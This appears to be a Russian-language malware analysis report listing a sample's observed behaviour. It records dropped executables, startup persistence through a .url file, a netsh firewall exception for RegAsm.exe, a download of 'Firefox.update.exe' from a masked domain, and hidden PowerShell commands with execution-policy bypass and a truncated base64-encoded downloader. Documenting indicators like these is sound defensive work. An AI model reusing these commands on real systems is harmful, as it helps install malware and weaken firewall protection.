Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\logoff.url
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
- %WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe
- %TEMP%\~df329e58821f778b50i.exe
- %HOMEPATH%\logoff\logoff.vbs
- %HOMEPATH%\logoff\rmttpmvscmgrsvr.exe
- http://th###ahotel.com/Firefox.update.exe
- DNS ASK th###ahotel.com
- '%TEMP%\~df329e58821f778b50i.exe'
- '%WINDIR%\syswow64\cmd.exe' "/c POWeRShELL.ExE -EX byPASs -nOp -w Hidden -Ec IAAJAAkAcwBlAHQALQBjAG8ATgBUAEUAbgB0AAkACQAgAC0AVgBhACAACQAJACgACQAgACAAJgAoAGcAYwBtACAATgBFAHcALQBvACoAKQAgAAkACQBOAEUAVAAuAHcAZQBC...' (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' "/c POWeRShELL.ExE -EX byPASs -nOp -w Hidden -Ec IAAJAAkAcwBlAHQALQBjAG8ATgBUAEUAbgB0AAkACQAgAC0AVgBhACAACQAJACgACQAgACAAJgAoAGcAYwBtACAATgBFAHcALQBvACoAKQAgAAkACQBOAEUAVAAuAHcAZQBC...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EX byPASs -nOp -w Hidden -Ec IAAJAAkAcwBlAHQALQBjAG8ATgBUAEUAbgB0AAkACQAgAC0AVgBhACAACQAJACgACQAgACAAJgAoAGcAYwBtACAATgBFAHcALQBvACoAKQAgAAkACQBOAEUAVAAuAHcAZQBCAEMATABJAGUAbgB0AAkAIAAJA...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\regasm.exe'